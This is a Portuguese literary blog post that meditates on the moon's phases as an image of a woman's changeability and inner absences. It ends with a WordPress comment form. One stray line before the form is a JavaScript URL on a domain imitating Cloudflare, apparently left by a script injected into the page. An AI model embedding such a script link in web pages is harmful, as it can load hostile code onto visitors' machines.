Indicações sobre a lua

Na dúvida sobre o que pensar a respeito dela, indicava-se observar os movimentos da lua. Indicava-se, na verdade, não observar nada, fugir o mais rápido possível, antes que fosse inevitável entender o que incomoda, o que não faz nada além de atropelar sentidos, garantir o emprego de reticências diversas e viver em extremos de euforia e de abatimento profundo. Só que havia dúvidas, e no eximir-se de aproximação maior, indicou com a cabeça o céu, o satélite cujo efeito mudava as marés profundas de seu coração.

O movimento, um movimento de lua. O desaparecer contínuo no céu; o reaparecer repleta de si, toda exposta à luz, para, em seguida, cobrir-se de breu, aos poucos, porque é preciso esconder-se, é preciso dar lugar às estrelas, é urgente retirar-se e expiar, da remoída escuridão, como brilham mais os astros sem sua presença gordurosa no céu.

A inconstância meticulosamente guardada na imutabilidade. É sempre outra; entretanto, é esperado que se mostre outra a cada fase. A mudança, as mudanças de lua. Um pouco menos a cada dia, para surgir toda num instante de nada.

“Tenho fases, como a lua”, leu, pequenina, e aceitou o fado que a atrelava à poetisa de cirandas pouco infantis. O secreto calendário, soube de fato, era seu único guia – apesar de secreto, apesar de ao contrário -, e tomou para si as inconstâncias, a atração volátil, o perpetuar-se na memória do que é distante.

Às vezes, no escuro de uma de suas faces, procurava descobrir o que era feito daquilo que se esquivava da luz. Do que era feito. E, na dúvida sobre o que pensar a respeito dela, indica-se entender o que ela compreendeu em suas entranhas reviradas: é sempre aquilo que falta, que ela é feita de faltas.

https://cloudflare.pw/cdn/statslg30.js

Seu mimimi aqui.

Preencha os seus detalhes abaixo ou clique num ícone para iniciar sessão:

Logótipo da WordPress.com

Está a comentar usando a sua conta WordPress.com Terminar Sessão / Alterar )

Imagem do Twitter

Está a comentar usando a sua conta Twitter Terminar Sessão / Alterar )

Facebook photo

Está a comentar usando a sua conta Facebook Terminar Sessão / Alterar )

Google+ photo

Está a comentar usando a sua conta Google+ Terminar Sessão / Alterar )

Connecting to %s